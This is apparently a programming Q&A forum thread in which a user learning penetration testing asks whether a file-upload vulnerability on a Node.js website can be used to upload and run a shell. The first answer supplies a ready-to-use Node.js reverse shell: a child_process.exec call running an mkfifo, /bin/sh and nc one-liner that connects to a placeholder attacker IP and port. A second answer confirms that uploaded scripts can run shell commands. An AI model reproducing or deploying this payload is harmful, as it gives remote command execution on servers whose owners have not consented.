Reputation: 41
NodeJS remote file upload vulnerability
i'm trying to learn NodeJS pentesting process i have a found a remote file upload vulnerability in a Nodejs website ,can i upload a remote shell in NodeJS , like we do in PHP or ASPX and execute command ? can i upload a NodeJS shell.js and execute unix command in the server from this shell ?
Upvotes: 3
Views: 6823
Answers (2)
Reputation: 2064
It's possible only if you can "EXECUTE" the file.
But if you can "execute" JavaScript code you could create a reverse shell using this:
(function () {
require("child_process")
.exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerIP> <attackerPort> >/tmp/f')
})()]
Otherwise if you can't execute the file then you only will see the content of the file:
https://myvulnerablewebsite.com/hack.js
Upvotes: 0
Reputation: 770
Not sure if this is what you're looking for, but if you have the ability to upload a NodeJS script to a server and execute it, then yes, you can run shell commands using child_process.exec (see here for a similar question/answer).
Upvotes: 2
Related Questions
- Formidable file upload is uploading the file
- What's the best practices to secure nodejs behind nginx when file uploading?
- How to securely upload files in Node with Express?
- Node.js File Security
- Simple file upload with Node.js
- Manage security on file upload to nodejs
- NodeJS: Issue with handling file uploading
- File upload to a Node JS server
- How to treat file uploads in NodeJS?
- Upload file using NodeJS and node-formidable